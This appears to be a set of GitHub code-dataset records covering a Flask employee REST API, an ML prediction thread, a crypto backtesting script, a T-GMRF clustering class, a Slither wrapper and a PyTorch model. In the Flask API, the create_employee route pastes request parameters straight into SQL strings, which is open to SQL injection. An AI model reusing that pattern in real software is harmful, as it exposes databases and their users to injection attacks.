query = conn.execute(\"select * from employees where EmployeeId =%d \" % eid)\n result = {'data': [dict(zip(tuple(query.keys()), i)) for i in query.cursor]}\n return jsonify(result)\n\n @app.route('/employees/create', methods=['POST'])\n def create_employee():\n column_names = {\n \"first_name\": \"FirstName\",\n \"last_name\": \"LastName\",\n \"address\": \"Address\",\n \"birth_date\": \"BirthDate\",\n \"city\": \"City\",\n \"country\": \"Country\",\n \"email\": \"Email\",\n \"fax\": \"Fax\",\n \"hire_date\": \"HireDate\",\n \"phone\": \"Phone\",\n \"postal_code\": \"PostalCode\",\n \"reports_to\": \"ReportsTo\",\n \"state\": \"State\",\n \"title\": \"Title\"\n }\n first_name = request.args.get('first_name')\n last_name = request.args.get('last_name')\n if first_name is None or last_name is None:\n return {\"error\": \"Field names are required\"}\n if len(first_name) == 0 or len(last_name) == 0:\n return {\"error\": \"Field names are empty\"}\n columns = \",\".join(column_names.get(column) for column in request.args)\n values = \"'{}', '{}'\".format(first_name, last_name)\n try:\n for column in request.args:\n if 
column != \"first_name\" and column != \"last_name\":\n value = request.args[column]\n if column == \"hire_date\" or column == \"birth_date\":\n values = values + \",'{}'\".format(datetime.strptime(value, \"%Y-%m-%d\"))\n elif column == \"reports_to\":\n values = values + \",{}\".format(int(value))\n else:\n values = values + \",'{}'\".format(value)\n except Exception as e:\n return {\"error\": \"Verify your parameters: {}\".format(e)}\n conn = db_connect.connect()\n print(columns, values)\n query = conn.execute(\"INSERT INTO employees (\" + columns + \") VALUES ( \" + values + \" )\")\n return {\"success\": \"Employee created, number of rows {}\".format(query.rowcount)}\n\n @app.route('/employees/delete', methods=['POST'])\n def delete_employee():\n employee_id = request.args.get('employee_id')\n if employee_id is None:\n return {\"error\": \"Employee ID not defined\"}\n try:\n employee_id = int(employee_id)\n except Exception as e:\n return {\"error\": \"Invalid employee ID: {}\".format(e)}\n conn = db_connect.connect()\n query = \"DELETE FROM employees where EmployeeId =%d \" % employee_id\n query = conn.execute(query)\n if query.rowcount == 0:\n return {\"skipped\": \"No employee was deleted\"}\n return {\"success\": \"Number of rows deleted {}\".format(query.rowcount)}\n\n @app.route('/employees/delete/last', methods=['POST'])\n def delete_last_employee():\n conn = db_connect.connect()\n query = conn.execute(\"DELETE FROM employees where EmployeeId = (SELECT MAX(EmployeeId) FROM employees)\")\n if query.rowcount == 0:\n return {\"skipped\": \"No employee was deleted\"}\n return {\"success\": \"Number of rows deleted {}\".format(query.rowcount)}\n\n\napi.add_resource(Employee) # Route_1\n\nif __name__ == '__main__':\n app.run(port='5002')\n", "repo_name": "amanajas/flask", "sub_path": "rest.py", "file_name": "rest.py", "file_ext": "py", "file_size_in_byte": 4333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_restful.Api", "line_number": 10, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_restful.Resource", "line_number": 14, "usage_type": "name"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 64, 
"usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}]} +{"seq_id": "16242697518", "text": "import threading\nimport time\nfrom utils.gendern import gender_detector\nfrom utils.age import age_detector\nfrom utils.emotion import emotion_detector\n\nclass prediction:\n def __init__(self, gen_det, age_det, emo_det):\n self.age_detector = age_detector()\n self.gender_detector = gender_detector()\n self.emotion_detector = emotion_detector()\n self.images = []\n self.results = []\n self.gen_det=gen_det\n self.age_det=age_det\n self.emo_det=emo_det\n\n def start_threads(self):\n x = threading.Thread(target=self.predict, args=([]), daemon=True)\n x.start()\n\n def pass_detections(self, dets):\n self.images = dets\n\n def predict(self):\n while True:\n try:\n newdets = []\n for img in self.images:\n age = \"\"\n gender = \"\"\n emotion = \"\"\n # Predict gender\n if(self.gen_det):\n gender = self.gender_detector.detect_gender(img[1])\n # Predict age\n if(self.age_det):\n age = self.age_detector.detect_age(img[1])\n # Predict emotion\n if (self.emo_det):\n emotion = self.emotion_detector.detect_emotion(img[1])\n # Append results to newdets\n newdets.append([img[0], img[1], gender, age, emotion])\n self.results = newdets\n except Exception as e:\n print(str(e))\n time.sleep(1/10)", "repo_name": "kretmatt/InnovationLab3", "sub_path": "utils/prediction.py", "file_name": "prediction.py", "file_ext": "py", "file_size_in_byte": 1612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.age.age_detector", "line_number": 9, "usage_type": "call"}, {"api_name": "utils.gendern.gender_detector", "line_number": 10, "usage_type": "call"}, {"api_name": "utils.emotion.emotion_detector", "line_number": 11, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "5157315117", "text": "\nimport numpy as np\nimport matplotlib\nimport pandas as pd\nimport datetime\nimport os.path\nimport sys\nimport math\nimport backtrader as bt\n\nfrom backtrader_plotting import Bokeh\nfrom backtrader_plotting.schemes import Tradimo\nmatplotlib.use('QT5Agg')\n\n\nfrom enum import Enum\nclass OrderDirection(Enum):\n NOTHING = 1\n BUY = 2\n SELL = 3\n\ndef StrategyN(n):\n return globals()['Strategy'+str(n)]\n\n\n\ndef Strategy1(df, profit_ratio=2.5):\n pexec = df.tail(1)['close'].values[0]\n direction = OrderDirection.NOTHING\n pslimit = psloss = np.nan\n #insert your strategy here\n return direction, pexec, pslimit, psloss\ndef Strategy2(df, profit_ratio=2.5):\n pexec = df.tail(1)['close'].values[0]\n direction = OrderDirection.NOTHING\n pslimit = psloss = np.nan\n #insert your strategy here\n return direction, pexec, pslimit, psloss\ndef Strategy3(df, profit_ratio=2.5):\n pexec = df.tail(1)['close'].values[0]\n direction = OrderDirection.NOTHING\n pslimit = psloss = np.nan\n #insert your strategy here\n return direction, pexec, pslimit, psloss\n\n\n\n \n# Create a Stratey\nclass TestStrategy(bt.Strategy):\n params = (\n ('Strategy_idx', 1),\n ('backtest_days', 6),\n ('len_df', 10), \n )\n\n \n def log(self, txt, dt=None):\n ''' Logging function fot this strategy'''\n dt = dt or self.datas[0].datetime[0]\n dt = bt.num2date(dt)\n 
print('%s(%d), %s' % (dt.isoformat(), self.nextcount, txt), file=self.f)\n\n def __init__(self):\n print('Strategy_idx'+str(self.p.Strategy_idx))\n self.outputpath = 'output.txt'\n self.f = open(self.outputpath, 'w') \n # self.profit_ratio = 2.5\n self.singleposloss = 5.0\n self.nextcount = 0\n self.dataclose = self.datas[0].close\n # self.lastcounttrade = 4000\n \n # To keep track of pending orders\n self.order = list()\n self.order_executed_price = None\n self.order_takeprofit_price = None\n self.order_stoploss_price = None\n self.order_size = None\n self.sma = bt.indicators.SimpleMovingAverage(period=self.p.len_df-24*self.p.backtest_days)#dummy for prepare data\n \n \n def notify_order(self, order):\n if order.status in [order.Submitted, order.Accepted]:\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n return\n\n # Check if an order has been completed\n # Attention: broker could reject order if not enough cash\n if order.status in [order.Completed]:\n if order.isbuy():\n self.log('BUY EXECUTED, %.8f | CURRENT POSITION: %.8f' %(order.executed.price, self.getposition(self.data).size))\n elif order.issell():\n self.log('SELL EXECUTED, %.8f | CURRENT POSITION: %.8f' %(order.executed.price, self.getposition(self.data).size))#, cerebro.broker.getvalue()\n\n self.bar_executed = len(self)\n\n elif order.status in [order.Canceled]:\n self.log('Order Canceled')\n elif order.status in [order.Margin]:\n self.log('Order Margin')\n elif order.status in [order.Rejected]:\n self.log('Order Rejected') \n\n # Write down: no pending order\n self.order = None\n \n def stop(self):\n self.order = self.order_target_size(target=0) \n self.log('STOP')\n self.log('CURRENT POSITION: %.8f' %self.getposition(self.data).size)\n self.log('TEST COUNT: %d' %self.nextcount)\n self.f.close()\n \n def next(self): \n self.nextcount = self.nextcount + 1\n self.log('Close, %.8f' %(self.dataclose[0]))\n \n if self.order:\n return\n\n\n # Check if we are in the market\n if not self.position:\n # print(len(self.dataclose))\n # print(self.datas[0].datetime.get(size=len(self.dataclose)))\n coldata_time = self.data.datetime.get(size=len(self.dataclose))\n coldata_open = self.data.open.get(size=len(self.dataclose))\n coldata_high = self.data.high.get(size=len(self.dataclose))\n coldata_low = self.data.low.get(size=len(self.dataclose))\n coldata_close = self.data.close.get(size=len(self.dataclose))\n coldata_volume = self.data.volume.get(size=len(self.dataclose))\n df_new = pd.DataFrame({'open': coldata_open,\n 'high': coldata_high,\n 'low': coldata_low,\n 'close': coldata_close,\n 'volume': coldata_volume})\n df_new.index = pd.to_datetime(df_new.index, format = '%Y-%m-%d %H:%M:%S')\n df_new.index.name = 'dateTime'\n\n direction, pexec, pslimit, psloss = StrategyN(self.p.Strategy_idx)(df_new)\n\n \n #sanity check\n if direction == OrderDirection.BUY and (pexecpsloss or pslimit>pexec):\n direction = OrderDirection.NOTHING\n \n if direction == OrderDirection.BUY:\n self.order_size = self.singleposloss/(pexec-psloss)\n self.log('BUY CREATE, (price: %.8f, pos: %.8f, cost: %.8f, lim: %.8f, sl: %.8f)' %(pexec,\n self.order_size,\n pexec*self.order_size,\n pslimit,\n psloss))\n self.order = self.buy_bracket(\n price=pexec, size=self.order_size,\n stopprice=psloss,\n limitprice=pslimit)\n \n \n \n elif direction == OrderDirection.SELL: \n self.order_size = self.singleposloss/(psloss-pexec)\n self.log('SELL CREATE, (price: %.8f, pos: %.8f, cost: %.8f, lim: %.8f, sl: %.8f)' %(pexec,\n self.order_size,\n 
pexec*self.order_size,\n pslimit,\n psloss)) \n self.order = self.sell_bracket(\n price=pexec, size=self.order_size,\n stopprice=psloss,\n limitprice=pslimit)\n \n\n\n\n# Create a cerebro entity\n \ndef run_backtest(target_pair, Strategy_idx, backtest_days):\n cerebro = bt.Cerebro()\n # df.to_csv('rawdata.csv',index=False)\n df = pd.read_csv('./1h_all/' + target_pair + '.csv', index_col=\"dateTime\", infer_datetime_format=True, parse_dates=True)\n df = df[[\"open\", \"high\", \"low\", \"close\", \"volume\"]]\n df.columns = [\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]\n # df = df.tail(24*30*2)#60days backtest\n \n df.to_csv('./backtest/' + target_pair + '.csv')\n \n \n \n\n \n\n \n # Add a strategy\n cerebro.addstrategy(TestStrategy, Strategy_idx=Strategy_idx, backtest_days=backtest_days, len_df=len(df))\n \n\n # Datas are in a subfolder of the samples. Need to find where the script is\n # because it could have been called from anywhere\n modpath = os.path.dirname(os.path.abspath(sys.argv[0]))\n datapath = os.path.join(modpath, './backtest/' + target_pair + '.csv')\n \n rawdata = bt.feeds.GenericCSVData(\n dataname=datapath,\n dtformat=('%Y-%m-%d %H:%M:%S'),\n name='rawdata',\n openinterest=-1\n )\n cerebro.adddata(rawdata)\n \n \n cerebro.resampledata(\n rawdata, \n timeframe=bt.TimeFrame.Days, #timeframe=bt.TimeFrame.Minutes, \n compression=1, #compression=60*8, \n name='daydata'\n )#8HR S/R\n # cerebro.adddata(pivotdata)\n \n cerebro.addobserver(bt.observers.Benchmark,\n timeframe=bt.TimeFrame.Weeks\n )\n cerebro.addanalyzer(bt.analyzers.TradeAnalyzer, _name=\"ta\")\n\n cerebro.addanalyzer(bt.analyzers.SQN, _name=\"sqn\")\n # 1.6 - 1.9 Below average\n # 2.0 - 2.4 Average\n # 2.5 - 2.9 Good\n # 3.0 - 5.0 Excellent\n # 5.1 - 6.9 Superb\n # 7.0 - Holy Grail?\n \n # Set our desired cash start\n cerebro.broker.setcash(162*10.0)\n \n \n \n # Print out the starting conditions\n print('Starting Portfolio Value: %.8f' % cerebro.broker.getvalue())\n myportfolio = cerebro.broker.getvalue()\n # Run over everything\n # cerebro.run(runonce=False)\n strategies = cerebro.run()\n firstStrat = strategies[0]\n \n # Print out the final result\n print('Final Portfolio Value: %.8f' % cerebro.broker.getvalue())\n myportfolio = cerebro.broker.getvalue() - myportfolio\n # cerebro.plot(style=\"candle\", iplot=False)\n \n # b = Bokeh(filename='chart.html', style='bar', plot_mode='single', scheme=Tradimo())\n # cerebro.plot(b, iplot=False)\n \n \n \n sqn = firstStrat.analyzers[1].get_analysis()['sqn']\n trades = firstStrat.analyzers[1].get_analysis()['trades']\n\n \n return sqn, trades, myportfolio\n\nif __name__ == '__main__':\n \n try:\n target_pair = (sys.argv[1])\n Strategy_idx = (sys.argv[2])\n backtest_days = (sys.argv[3])\n except:\n target_pair = \"BTCUSDT\"\n Strategy_idx = 3#3:0.6, 4:0.3\n backtest_days = 7\n \n run_backtest(target_pair, Strategy_idx, backtest_days)\n ", "repo_name": "hunej/BinanceFuturesQuanTradingFramework", "sub_path": "mybacktest.py", "file_name": "mybacktest.py", "file_ext": "py", "file_size_in_byte": 9532, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.use", "line_number": 13, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 42, "usage_type": "attribute"}, 
{"api_name": "backtrader.Strategy", "line_number": 50, "usage_type": "attribute"}, {"api_name": "backtrader.num2date", "line_number": 61, "usage_type": "call"}, {"api_name": "backtrader.indicators.SimpleMovingAverage", "line_number": 80, "usage_type": "call"}, {"api_name": "backtrader.indicators", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 133, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 138, "usage_type": "call"}, {"api_name": "backtrader.Cerebro", "line_number": 182, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 203, "usage_type": "name"}, {"api_name": "os.path.path.abspath", "line_number": 203, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.path.join", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 204, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 204, "usage_type": "name"}, {"api_name": "backtrader.feeds.GenericCSVData", "line_number": 206, "usage_type": "call"}, {"api_name": "backtrader.feeds", "line_number": 206, "usage_type": "attribute"}, {"api_name": "backtrader.TimeFrame", "line_number": 217, "usage_type": "attribute"}, {"api_name": "backtrader.observers", "line_number": 223, "usage_type": "attribute"}, {"api_name": "backtrader.TimeFrame", "line_number": 224, "usage_type": "attribute"}, {"api_name": "backtrader.analyzers", "line_number": 226, "usage_type": "attribute"}, {"api_name": "backtrader.analyzers", "line_number": 228, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 268, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 269, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 270, "usage_type": "attribute"}]} +{"seq_id": "27380021021", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 1 22:14:30 2020\n\n@author: vito\n\"\"\"\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nfrom Solver.TGMRF_solver import TGMRF_solver\nfrom time import time\nimport os\nimport pickle as pkl\n\nclass TGMRF:\n \"\"\"\n The implementation is Time-varying Gaussian Markov Random Feilds based clustering algorithm\n \n Parameters\n ----------\n \"\"\"\n def __init__(self, epsilon=50, width=10, stride=1, maxIters=30, lr=0, lamb=1e-2, beta=1e-2, measure=\"euclidean\", verbose=True, verbose_ADMM=False,dimension_reduce=True,dataset_name=\"Test\",use_dump=False,maxIters_ADMM=1000):\n self.epsilon = epsilon\n self.width = width\n self.stride = stride\n self.measure = measure\n self.maxIters = maxIters\n self.lr =lr\n self.lamb = lamb\n self.beta = beta\n self.verbose = verbose\n self.project_matrix = None\n self.initilizing = False\n self.verbose_ADMM = verbose_ADMM\n self.dimension_reduce = dimension_reduce\n self.dataset_name = dataset_name\n self.use_dump = use_dump\n self.maxIters_ADMM = maxIters_ADMM\n \n def triangle_l_2_matrix_l(self, l):\n n = int((-1 + np.sqrt(1+ 8*l))/2)\n return n\n \n def upper2Full(self, a):\n n = self.triangle_l_2_matrix_l(a.shape[0])\n A = np.zeros([n,n])\n A[np.triu_indices(n)] = a\n temp = A.diagonal()\n A = (A + A.T) - np.diag(temp)\n return A\n \n def 
predict(self, X):\n \"\"\"\n Fix the model and construct the project matrix\n \n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, l_features, m_lengths]\n New data to transform.\n \n Returns\n -------\n C_trans : array, shape [n_samples, k]\n Compacted vectors of T-GMRF after PCA\n \"\"\"\n if not type(self.project_matrix) is np.ndarray:\n raise RuntimeError('Please fitting the model beforehand!')\n\n # Compute Time-varying Gaussian Markov Random Fields for every MTS (multivariaten time series) \n n_samples = X.shape[0]\n m_lengths = X.shape[2]\n l_features = X.shape[1]\n s_windows = int((m_lengths - self.width) / self.stride + 1)\n self.C = np.zeros((int(l_features * (l_features + 1) * s_windows / 2), n_samples))\n cov_matrix_len = int(l_features * (l_features + 1) / 2)\n\n clf = TGMRF_solver(width=self.width, stride=self.stride, \n maxIters=self.maxIters, lr=self.lr, lamb=self.lamb, beta=self.beta, initilizing=self.initilizing, verbose_ADMM=self.verbose_ADMM,maxIters_ADMM=self.maxIters_ADMM)\n \n aggregated_ll_Loss = 0\n aggregated_penalty_loss = 0\n\n for i in tqdm(range(n_samples), ascii=True, desc=\"TGMRF\"):\n ics, loss, ll_loss, penalty_loss, numberOfParameters = clf.fit(X[i].T)\n aggregated_ll_Loss += ll_loss\n aggregated_penalty_loss += penalty_loss\n for j in range(s_windows):\n self.C[j * cov_matrix_len: (j + 1) * cov_matrix_len, i] = ics[j]\n\n C_normalize = preprocessing.normalize(self.C, norm='l2')\n\n # Projecting the features\n C_trans = np.dot(C_normalize.T, self.project_matrix)\n\n return C_trans\n \n def fit_transform(self, X):\n \"\"\"\n Transform X todistance matrix.\n \n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, l_features, m_lengths]\n New data to transform.\n \n Returns\n -------\n distance : array, shape [n_samples, n_samples]\n similarity distance matrix.\n ...\n Other useful data structure.\n \"\"\"\n # Compute Time-varying Gaussian Markov Random Fields for every MTS (multivariaten time series) \n n_samples = X.shape[0]\n l_features = X.shape[1]\n m_lengths = X.shape[2]\n s_windows = int((m_lengths - self.width) / self.stride + 1)\n self.C = np.zeros((int(l_features * (l_features + 1) * s_windows / 2), n_samples))\n cov_matrix_len = int(l_features * (l_features + 1) / 2)\n\n duration, aggregated_ll_Loss, aggregated_penalty_loss, numberOfParameters = 0, 0, 0, 0\n\n start = time()\n\n dump_file = f\"./dump/{self.dataset_name}/T_GMRF_{self.dataset_name}_dump.pkl\"\n\n if not os.path.exists(dump_file) or not self.use_dump:\n\n if self.dataset_name in ['EEG', \"DuckDuckGeese\", \"FingerMovements\"]:\n initilizing = True\n else:\n initilizing = False\n\n clf = TGMRF_solver(width=self.width, stride=self.stride, \n maxIters=self.maxIters, lr=self.lr, lamb=self.lamb, beta=self.beta, verbose_ADMM=self.verbose_ADMM,initilizing=initilizing)\n \n aggregated_ll_Loss = 0\n aggregated_penalty_loss = 0\n\n for i in tqdm(range(n_samples), ascii=True, desc=\"TGMRF\"):\n ics, loss, ll_loss, penalty_loss, numberOfParameters = clf.fit(X[i].T)\n aggregated_ll_Loss += ll_loss\n aggregated_penalty_loss += penalty_loss\n for j in range(s_windows):\n self.C[j * cov_matrix_len: (j + 1) * cov_matrix_len, i] = ics[j]\n \n if self.use_dump:\n output = open(dump_file, 'wb')\n pkl.dump(self.C, output)\n else:\n output = open(dump_file, 'rb')\n self.C = pkl.load(output)\n \n duration = time() - start\n \n # normalizing C\n \"\"\"\n # worsen performance for z-normalize\n # the l2-norm normalization is applied\n quantile_transformer 
= preprocessing.QuantileTransformer(\n output_distribution='normal', random_state=0)\n C = quantile_transformer.fit_transform(C)\n \"\"\"\n\n C_normalize = preprocessing.normalize(self.C, norm='l2')\n # keep original feature\n # C_normalize = self.C\n \n if self.dimension_reduce:\n \n try:\n reduce_dump = f\"./dump/{self.dataset_name}/Reduce_{self.dataset_name}_dump.pkl\"\n use_reduce_dump = False\n if not os.path.exists(reduce_dump) or not use_reduce_dump:\n\n # Covariance of C\n Sigma_c = np.cov(C_normalize)\n \n # Run SVD algorithm onto covariance matrix of C\n u, s, vh = np.linalg.svd(Sigma_c, full_matrices=True)\n\n if use_reduce_dump:\n reduce = open(reduce_dump, 'wb')\n pkl.dump((Sigma_c, u, s, vh), reduce)\n else:\n reduce = open(reduce_dump, 'rb')\n Sigma_c, u, s, vh = pkl.load(reduce)\n \n # According to the energy content threshold, select the first k eigenvectors\n totally_variance = sum(s)\n k = len(s)\n for i in range(len(s), 0, -1):\n if sum(s[:i])/totally_variance*100 < self.epsilon:\n k = i + 1\n break\n \n # Projecting the features\n C_trans = np.dot(C_normalize.T, u[:, :k])\n\n # dump the projecting matrix\n self.project_matrix = u[:, :k]\n except:\n pca = PCA(n_components=8) # DuckDuckGeese:8\n C_trans = pca.fit_transform(C_normalize.T)\n else:\n C_trans = C_normalize.T\n \n return C_trans, duration, aggregated_ll_Loss, aggregated_penalty_loss, numberOfParameters\n\n def fit(self, X_train, X_test):\n \"\"\"\n Fix the model and construct the project matrix\n \n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, l_features, m_lengths]\n New data to transform.\n \n Returns\n -------\n None\n \"\"\"\n\n X = np.concatenate((X_train, X_test), axis=0)\n\n C_trans, duration, aggregated_ll_Loss, aggregated_penalty_loss, numberOfParameters = self.fit_transform(X)\n \n C_trans_train = C_trans[:X_train.shape[0]]\n\n C_trans_test = C_trans[-X_test.shape[0]:]\n\n return C_trans, C_trans_train, C_trans_test", "repo_name": "Vitoom/T-GMRF", "sub_path": "TGMRF.py", "file_name": "TGMRF.py", "file_ext": "py", "file_size_in_byte": 8544, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.sqrt", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.triu_indices", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 76, "usage_type": "call"}, {"api_name": "Solver.TGMRF_solver.TGMRF_solver", "line_number": 79, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 85, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 92, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 92, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 120, "usage_type": "call"}, {"api_name": "time.time", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "Solver.TGMRF_solver.TGMRF_solver", "line_number": 136, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 142, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 151, 
"usage_type": "call"}, {"api_name": "pickle.load", "line_number": 154, "usage_type": "call"}, {"api_name": "time.time", "line_number": 156, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 167, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "numpy.cov", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.linalg.svd", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 186, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 226, "usage_type": "call"}]} +{"seq_id": "71764659047", "text": "import subprocess # library used to interact with command line\nimport os\nimport re\nfrom graphviz import Source\n\n# slither proxy class for grnrrating the call graph\nclass SlitherProxy:\n def __init__(self):\n self.current_dir = os.getcwd()\n self.output_folder = self.current_dir\n\n def genCallGraph(self, contractName):\n try:\n subprocess.run(['slither', contractName, '--print', 'call-graph'])\n call_graph_filename = f'{contractName}.all_contracts.call-graph.dot'\n call_graph_path = os.path.join(self.output_folder, call_graph_filename)\n\n if os.path.exists(call_graph_path):\n call_graph_png_path = os.path.join(self.output_folder, f'{contractName}.all_contracts.call-graph.dot.png')\n graph_source = Source.from_file(call_graph_path, format=\"png\")\n graph_source.render(view=False) # Optional: Open the PNG file after rendering\n print(f\"Call Graph saved to: {call_graph_path}\")\n return call_graph_png_path\n else:\n print(\"Error: Call graph file not created.\")\n except subprocess.CalledProcessError as e:\n print(f\"Error executing Slither: {e}\")\n #def highlightCallGraph(self, contractName):\n def genListOf_VarFun(self, contractName, output_file='output.txt'):\n # command to generate list of state variables and functions\n subprocess.run(['slither', contractName, '--print', 'vars-and-auth'])\n with open(output_file, 'w') as output_file:\n result = subprocess.run(['slither', contractName, '--print', 'vars-and-auth'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n cleaned_output = re.sub(r'\\x1b\\[[0-9;]*[mK]', '', result.stdout + result.stderr) # Remove ANSI escape codes\n output_file.write(cleaned_output)\n def get_state_variables(self, output_file_path):\n # Read the content of the output.txt file\n with open(output_file_path, 'r') as file:\n output_content = file.read()\n\n # Find all matches for state variables\n state_variables_matches = re.findall(r'\\|\\s+(\\w+)\\s+\\|\\s+\\[([^]]*)\\]\\s+\\|', output_content)\n\n # Extract state variables excluding those starting with '_'\n state_variables = [var.strip(\"'\") for function, variables in state_variables_matches for var in variables.split(', ') if not var.strip(\"'\").startswith('_')]\n\n # Remove duplicates\n state_variables = list(set(state_variables))\n\n return state_variables\n\n# Example usage:\n# result = subprocess.run(['slither', contractPath, '--print', 'vars-and-auth']\n # , shell=True, capture_output=True)\n # 
# Access the output\n # output = result.stdout\n # return output\n\n\n\n\n", "repo_name": "zainab-yousaf/FYP-Fuzzing", "sub_path": "slither.py", "file_name": "slither.py", "file_ext": "py", "file_size_in_byte": 2788, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.getcwd", "line_number": 9, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "graphviz.Source.from_file", "line_number": 20, "usage_type": "call"}, {"api_name": "graphviz.Source", "line_number": 20, "usage_type": "name"}, {"api_name": "subprocess.CalledProcessError", "line_number": 26, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 31, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 33, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 34, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "34460881121", "text": "import torch\n\nfrom music_genre_classification.models.classification_model import (\n TorchMertClassIncrementalModel,\n)\n\n\nclass TorchL2PClassIncrementalModel(TorchMertClassIncrementalModel):\n def forward(self, inputs: torch.Tensor):\n outputs, key_loss = self.encoder(inputs)\n outputs = self.decoder(outputs)\n return outputs, key_loss\n", "repo_name": "pedrocg42/music-genre-classification", "sub_path": "music_genre_classification/models/torch_l2p_class_incremental_model.py", "file_name": "torch_l2p_class_incremental_model.py", "file_ext": "py", 